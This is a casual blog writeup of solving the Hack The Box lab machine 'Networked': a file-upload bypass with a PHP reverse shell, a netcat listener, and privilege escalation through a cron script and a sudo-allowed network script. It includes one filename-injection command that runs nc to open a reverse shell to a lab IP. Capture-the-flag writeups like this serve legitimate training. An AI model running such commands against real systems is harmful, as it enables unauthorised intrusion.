Skip to content

Hack The Box — Networked Writeup without Metasploit

Networked yes, I learnt to patient with this box. Gave me a headache. Made so many mistakes. But then again learnt a lot cause of those stupid mistakes I was making. so here it goes. Nmap as usual

port 80 was open.

They are building something called facemash. two people are funding it and there is a pool party. Let’s skip the pool party and check out whats behind the scene.

Upload and gallery not linked that means it’s up but not linked yet. Let’s ask gobuster to do it’s thing.

Web hacking is the worst nightmare for me. I hate it and don’t know much about it. Need to learn more about it. anyway checked out backup first cause it might have some juicy stuff. Low hanging fruits or something.

Downloaded the folder extracted and found a bunch of php files. found upload and gallery.

after reading those files got a php reverse shell. modified it. To bypass the security check had to insert an extra line in to the file.

now we need to upload the reverse shell but before that have rename the file. have to be a jpg or png etc …

Annnnnd it’s uploaded. Time to check out the pool party pics. Set up the netcat listener so need to catch those pics HAHAHAH evil laugh.

We have a shell. I nearly lost my hair during the process from here on. Was hard. I don’t even know why the box was given an easy tag or maybe I’m just too dumb to get it. definitely can’t blame a noob. Since we have a shell need to check for the user flag.

who am I kidding right? I’m as an apache user trying to access a user called guly. I just hope he is not the pink hat guy. now we need to read the check attack file and also check out the crontab.guly. First thing I did was check out the crontab.

ok so in every 3 minutes it runs the check_attack.php file. Let’s read the check_attack file

All it does was delete files from the location and also it requires lib.php which we downloaded earlier. It sends a mail to guly. Let’s check we can make a file in /var/www/html/uploads/ but before that lets see if there is anything interesting with sudo -l

what’s wrong with this guy? seriously? I was getting pissed. Bunch of codes and can’t even view this?

created a shell script called bash.sh ran the file php -f /home/guly/check_attack.php

It deleted the bash script which was created. We cant inject code to those scipts. We don’t have the rights to do. Started to read the code again. Read it few more times. trying to understand the code. Started reading stuff online and found a solution to it.

Had to run a command like this touch '; nc -c bash 10.10.14.4 4443' in the /var/www/html/uploads/ since I’m a noob and an honest noob I took it from a writeup of someone else. accidentally closed that page. Who ever it was I’m grateful to him for solving that problem. And in my defense you’re allowed to search from the internet while doing OSCP.

I did that and because of my curiosity and stupidity I ran the attacker file like before which again gave limited shell as previous one. I spent more than half an hour trying to figure out what went wrong.

Finally figured out that it has to run on its own. Had to wait 3 minutes for it to run and not force it. What is wrong with me right?

Finally got guly user. Now lets run sudo -l

there is a changename script which can run using root without password. That made me happy. NOPASSWD such a wonderful thing.

Wonderful thing didn’t last long. Can’t write to that file. New chapter of sadness starts. checked out the content of changename.sh

I guess that’s basically a network scipt. let’s run it.

It needed input. Time to experiment. it did give a shell but its the same user. So it kind of worked but didn’t work. Started doing more experiments.

I couldn’t handle it anymore spawned a shell which looks way better and also more experiments

And that did the trick. later on found out there was a flow about some white space.

Published inHackinghacktheboxOSCP

Be First to Comment

Leave a Reply

Your email address will not be published.

%d bloggers like this: